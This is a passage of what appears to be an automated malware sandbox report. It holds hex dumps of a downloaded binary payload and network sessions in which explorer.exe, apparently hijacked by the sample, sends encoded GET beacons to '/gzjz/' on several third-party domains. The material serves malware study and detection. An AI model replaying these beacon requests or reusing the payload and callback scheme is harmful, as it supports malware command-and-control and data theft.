6d c3 53 fd
                                                Data Ascii: $K}rcC.C-`< 7^\\o=xw8~v{\7O!/aSrZh<e3@\6JiO'uFr{/SpMgJOZM]eZE=wet7`Jk8sx~di#k80,Ng9y$="9P mBh5D5*`<;HH$-_kQ{y\u,u~> d'ZWmSF<"K@sm~6:"y<Q\ 'Ve{McC2'm;%qFQ<Ky~?8uV]MT8a8!X19ZH:rtYeR{^X[/byC}`C,Zg1(\t[A:CYfFya2njkB64:)"U&_zg]G;C[{sIRq9|i|0$468rt -Fkm@5^JIb`<{zHK(FC*0.GCpErodS5d;SU,]COciv*ro#~R**yZe(h/0&F\6JiO'uFr{/pMiU.\)diE#m4jzKQ<-)k8[6O>re-}kRgIi0y;HH%._kqy\u,Oe~>8 d'ZWmS
                                                Feb 25, 2021 15:34:16.496635914 CET1152INData Raw: 46 04 8b 3e 22 f7 49 d1 eb df 40 73 97 0d b4 b9 ec 82 7e 26 8a e8 2a 22 79 3c 51 4c de bf ee 20 b1 fe 1d 90 27 46 9b a9 f8 65 ea fa 9f 7b 0e 4d e2 63 06 43 dc 8b fe 04 ce 32 9a 27 6d aa 3b 25 bc 71 a2 46 51 80 ce 03 07 9d bd 89 3c 4b 79 93 a5 7e
                                                Data Ascii: F>"I@s~&*"y<QL 'Fe{McC2'm;%qFQ<Ky~?8uV]MT8a8!X19ZH:rtYeR{^X[/byC}`&XZ|e1(\t[A:CYfFya2njkB6
                                                Feb 25, 2021 15:34:16.496656895 CET1154INData Raw: db 69 55 f5 8c d5 ee a2 2e 89 f5 5c 29 97 64 69 1f 0c 07 f5 ad d0 88 da 45 01 bb 23 bb cb a7 ae 6d c9 34 97 e2 6a 93 7a 9a 4b 51 1d a5 3c a0 2d b9 09 de 0d cc ec 87 80 29 ba ea 9c bd ad cc 6b 38 f5 01 8d 8a ad 8a 83 d1 b8 c9 9d a8 a5 f9 f5 91 5b
                                                Data Ascii: iU.\)diE#m4jzKQ<-)k8[6O>re-}kRgIi0y;HH%._kqy\u,Oe~>8 d'ZWmSF>"I@s~&*"y<QL 'Fe
                                                Feb 25, 2021 15:34:16.496682882 CET1155INData Raw: 1e 8e b4 ca 62 60 1d bb ee a3 3c 7b b8 ef 7a b6 80 99 d9 c4 48 b0 b2 a4 ff d0 9d ce 4b d4 84 1c 28 da 80 ba f2 11 0c 46 b8 d2 d2 43 cc 8a 2a 30 91 b9 c1 bf df c0 d1 2e 47 03 43 70 45 e2 72 e5 ef 6f 64 53 aa 35 86 64 e0 d5 e9 3b a5 0a bd f4 53 8b
                                                Data Ascii: b`<{zHK(FC*0.GCpErodS5d;SU,]COciv*ro#~R**yZe(h/0&F\6JiO'uFr{/pMiU.\)diE#m4jzKQ
                                                Feb 25, 2021 15:34:16.496706009 CET1157INData Raw: 1e e0 d9 f1 40 45 55 86 7d d4 e9 65 50 e6 2f 20 16 31 75 f5 44 a7 7c b5 a3 60 28 c7 ff af 9c 62 cc 87 a2 ca f0 b6 5d a8 2b 80 47 68 ab e9 d4 59 66 38 14 56 cb b9 1a 06 c8 86 37 63 32 f8 64 ee 5c 65 f5 e3 c7 ef 05 0d 62 8a 0d ba 6b d3 74 14 f0 54
                                                Data Ascii: @EU}eP/ 1uD|`(b]+GhYf8V7c2d\ebktT&ZePIo- Q2\H_IB?1R SeS#nE"k-Iv!aE.s/mBLqCuN-u#w[~pR&Hf'B!LM:83+0yQl
                                                Feb 25, 2021 15:34:16.496727943 CET1158INData Raw: bb e0 3a df 9b 2c 4d 85 3c 23 df 0c 00 7a 2b e8 17 15 67 90 55 48 eb 1c f4 9b 3e 86 0e 94 78 a2 ff 74 c1 4b d0 6e 9f 2c 5a a8 88 68 f2 79 0b 5e fd b9 a3 66 13 d5 dd e6 49 24 a6 19 3a 1e db 4e 01 06 99 2e 54 5c 2c 0c 9e 15 05 01 f8 8d 50 25 e6 fe
                                                Data Ascii: :,M<#z+gUH>xtKn,Zhy^fI$:N.T\,P%#t(j]Qkrb'}_\Vg1:D7c!VEtIK<.LA_3pG~u-R9/;_w]C/P^=v^d%e)toi*B
                                                Feb 25, 2021 15:34:16.496752024 CET1159INData Raw: 07 26 b3 ba 94 37 b0 f2 cf fc fc 62 0a 1e 8f 37 21 f3 cc 80 23 23 00 d7 30 e9 34 a2 ce 55 07 1c ec a9 08 73 2a 9c 8c 00 d5 32 d9 29 69 9b 96 3b 10 1b cd 6a 55 8c 24 ba fe 4a 85 1d 9c 60 2b 65 37 cb 68 25 de 27 09 5d ce 5d e3 5a c3 f1 eb 7f 9e 19
                                                Data Ascii: &7b7!##04Us*2)i;jU$J`+e7h%']]ZxRWz(}PWMF6b4V*_7!%E>YP|4Q7W4Q4>QHOG}8)TD`H2o~**ToB*l5[
                                                Feb 25, 2021 15:34:16.496774912 CET1161INData Raw: d5 8e 9b b8 6f 8c 3b 92 24 5f 57 ec c9 00 25 da 51 0d e0 d4 b4 66 4d 01 01 c2 70 5b b6 26 a9 30 ba 73 4f 76 98 e2 44 4e f6 cf d9 7f 6a 62 4e 7f 66 eb 25 c2 b5 75 21 e3 28 62 31 3e 3f 72 b8 ef 5f a0 42 0d ee 35 aa 3b d9 15 c6 e8 72 d5 cf 3b 56 a1
                                                Data Ascii: o;$_W%QfMp[&0sOvDNjbNf%u!(b1>?r_B5;r;VEE4`%'PZD~rh%*i@1=lj"K6n%(8/aq-5c,b;]7)D=2rY\-&KM=Hv323p-]|[
                                                Feb 25, 2021 15:34:16.496798038 CET1162INData Raw: 48 4d 83 88 51 d6 35 96 3c 52 15 9d 81 e8 88 84 50 90 4e 82 ee 97 03 2b e1 24 42 39 06 eb 4f d6 a0 eb c3 9f 48 2c 85 0a 66 3c 1b 84 0a 9d 2f ad 86 9a 21 06 72 7c d7 ef 14 68 12 8b 1d dd 5f 76 18 37 c4 9d 44 2f 12 93 9d bc f6 84 45 ca a3 99 44 0f
                                                Data Ascii: HMQ5<RPN+$B9OH,f</!r|h_v7D/EDBnXumC[4+Y;a|r(eXtq*$~(#BYF{=<iQ`6&-g]ejF9AX=T@CF!Ty:,gDLaA\G
                                                Feb 25, 2021 15:34:16.496819973 CET1164INData Raw: 83 30 8c b1 25 c0 51 76 5a 79 f8 50 45 bd 03 e1 57 28 fc 67 1d 05 5d 43 5c a7 af 75 9b bf 53 36 b9 26 20 9b b7 32 c4 e1 ec db 36 04 85 2b d5 fe 09 31 2d dc 23 61 f3 80 43 14 a2 cb d2 1a 46 fb 8b c1 e3 31 41 50 0d 20 40 8c 97 06 4a 30 96 92 f5 57
                                                Data Ascii: 0%QvZyPEW(g]C\uS6& 26+1-#aCF1AP @J0Wc4@p8Vnso<l3ZQ0}6 RkvF8#bM3>a8W-[HbUZj]lx?OaK"Ra
                                                Feb 25, 2021 15:34:16.552798986 CET1165INData Raw: 5a 5e 11 98 a1 cc 7e d3 d6 69 f1 e0 57 22 8d 42 65 32 97 e4 2f bf 2e e9 a8 b3 e7 62 4e 6f fe 9c bc ca 8b 92 d0 ce c4 8a 46 93 a5 bc 9e ea cc 55 26 44 cb a2 f0 0c 52 35 d7 34 dd 6a 97 b2 db 69 55 7e f0 6d ea 63 d5 81 34 93 21 16 87 96 1f 0c 07 7e
                                                Data Ascii: Z^~iW"Be2/.bNoFU&DR54jiU~mc4!~H0[/64+pU%Mx)% ||yvB.HzWK+}cg?yzoh#LA6{N 65Y4SSq>8J\L'/


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.54972123.227.38.7480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:34:59.519618988 CET1741OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1
                                                Host: www.buytgp.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:34:59.716490030 CET1742INHTTP/1.1 403 Forbidden
                                                Date: Thu, 25 Feb 2021 14:34:59 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Sorting-Hat-PodId: 149
                                                X-Sorting-Hat-ShopId: 47348220054
                                                X-Dc: gcp-us-central1
                                                X-Request-ID: a7602c6c-8aa4-43ef-9205-55bf2ef16f75
                                                Set-Cookie: _shopify_fs=2021-02-25T14%3A34%3A59Z; Expires=Fri, 25-Feb-22 14:34:59 GMT; Domain=buytgp.com; Path=/; SameSite=Lax
                                                X-Download-Options: noopen
                                                X-Permitted-Cross-Domain-Policies: none
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 087b36605d0000248480afa000000001
                                                Server: cloudflare
                                                CF-RAY: 6272267a2fcd2484-FRA
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 35 61 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                Data Ascii: 5af<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:
                                                Feb 25, 2021 15:34:59.716525078 CET1743INData Raw: 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69
                                                Data Ascii: 1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.act
                                                Feb 25, 2021 15:34:59.717433929 CET1744INData Raw: 65 36 65 0d 0a 0a 20 20 22 63 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 50 c5 99 c3 ad 73 74 75 70 20 62 79 6c 20 6f 64 65 70 c5 99 65 6e 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 65 6d c3 a1
                                                Data Ascii: e6e "cs": { "title": "Pstup byl odepen", "content-title": "Nemte oprvnn k pstupu k tomuto webu" }, "nb": { "title": "Tilgang nektet", "content-title": "Du har ikke tillatelse til pne dette nettste
                                                Feb 25, 2021 15:34:59.717458010 CET1746INData Raw: 65 20 65 6e 74 73 70 72 65 63 68 65 6e 64 65 20 42 65 72 65 63 68 74 69 67 75 6e 67 20 66 c3 bc 72 20 64 65 6e 20 5a 75 67 72 69 66 66 20 61 75 66 20 64 69 65 73 65 20 57 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 69 74 22 3a 20 7b 0a 20 20
                                                Data Ascii: e entsprechende Berechtigung fr den Zugriff auf diese Website" }, "it": { "title": "Accesso negato", "content-title": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu",
                                                Feb 25, 2021 15:34:59.717474937 CET1747INData Raw: 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 45 72 69 c5 9f 69 6d 20 72 65 64 64 65 64 69 6c 64 69 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 42 75 20 77 65 62 20 73 69 74 65 73 69 6e 65 20 65 72 69 c5 9f
                                                Data Ascii: : { "title": "Eriim reddedildi", "content-title": "Bu web sitesine eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd
                                                Feb 25, 2021 15:34:59.717485905 CET1747INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:04.845968008 CET5245OUTGET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.delmarranch.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:04.985801935 CET5246INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Feb 2021 14:35:04 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "60363547-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.549729104.21.56.9380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:15.562661886 CET5751OUTGET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.apkiinsurance.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:15.637638092 CET5752INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 25 Feb 2021 14:35:15 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: __cfduid=ddde661592d9bcb9b6cf9e7d17c606d9f1614263715; expires=Sat, 27-Mar-21 14:35:15 GMT; path=/; domain=.apkiinsurance.com; HttpOnly; SameSite=Lax
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Location: https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 087b369f08000017828e35b000000001
                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7z%2FyFE9jg2zW17FvmVo2E2dzCU%2FxKMiRAsQO46Cn0b%2F73vsEuJFIiGWPfRZbSPOL9DwHUvxB0kJymlmxmA%2Bk5GIKVYecOYHIe4IULEKRB1pcpE6zM2k%3D"}]}
                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 627226de79281782-FRA
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 6b 69 69 6e 73 75 72 61 6e 63 65 2e 63 6f 6d 2f 67 7a 6a 7a 2f 3f 69 42 3d 71 6a 76 47 63 70 42 53 39 67 6e 67 66 63 63 78 77 35 51 46 74 79 2b 65 45 5a 55 56 6c 49 4b 41 76 6c
                                                Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl
                                                Feb 25, 2021 15:35:15.637666941 CET5753INData Raw: 36 4e 45 32 35 4d 4f 4d 63 79 44 31 58 4f 76 55 4b 35 50 36 4d 75 32 32 59 38 48 76 65 64 4b 50 33 61 26 61 6d 70 3b 6f 48 32 64 3d 59 54 38 78 5a 64 58 68 2d 38 4c 50 44 58 33 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e
                                                Data Ascii: 6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&amp;oH2d=YT8xZdXh-8LPDX3">here</a>.</p></body></html>
                                                Feb 25, 2021 15:35:15.637679100 CET5753INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.549730192.0.78.2580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:20.764060974 CET5753OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1
                                                Host: www.bestcroissantinlondon.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:20.804835081 CET5754INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: close
                                                Location: https://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS
                                                X-ac: 2.hhn _dca
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.54973194.136.40.5180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:25.975158930 CET5755OUTGET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.thakehamwesthorsley.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:26.032011032 CET5756INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:24 GMT
                                                Content-Type: text/html
                                                Content-Length: 793
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.549733146.148.189.21680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:31.477104902 CET5766OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:31.959116936 CET5767OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
